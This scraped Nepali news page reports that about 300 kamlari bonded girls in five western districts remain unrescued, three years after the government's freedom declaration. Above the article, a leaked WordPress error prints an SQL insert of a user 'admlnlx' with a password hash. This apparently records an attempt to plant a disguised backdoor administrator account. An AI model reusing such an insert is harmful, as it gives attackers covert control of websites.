WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2ftyJ/N6U23ycgGmjhNV2ow8xtXk70', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-27 09:13:29', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,पुस ६ –
पश्चिम नेपालका पाँच जिल्लामा दासत्वको जिवन विताईरहेका झण्डै तीन सय कमलरीको अझै उद्दार हुन सकेको छैन ।बाँके, बर्दिया, कैलाली, कञ्चनपुर र दाङ्गमा अझै पनि कमलहरी रहेको मुक्त कमलरी विकास मञ्चले जनाएको छ । बाँकेमा रहेका ६ सय ५० कमलरी मध्ये २० जना कमलरीको अझैं उद्दार हुन सकेको छैन ।
सरकारले कमलहरी मुक्त घोषणा गरेको तीन वर्ष पूरा भइसकेको छ । अहिलेसम्म देशभर कुल १२ हजार सात सय कमलरीको उद्दार गरिएको छ । मुक्त घोषणा भएको लामो समयसम्म पनि आफूहरुको बारेमा सरकार गम्भीर नभएको गुनासो मुक्त कमलहरीको छ ।
मुक्त कमलरी विकास मञ्च बाँकेकी अध्यक्ष दिलकुमारी चौधरीले राज्यले मुक्त कमलरीलाई बेवास्ता गरेकोमा दुःखी भएको बताउनुभयो । सरकारले २०७० असार १३ गते कमलरी मुक्त घोषणा गरेको थियो ।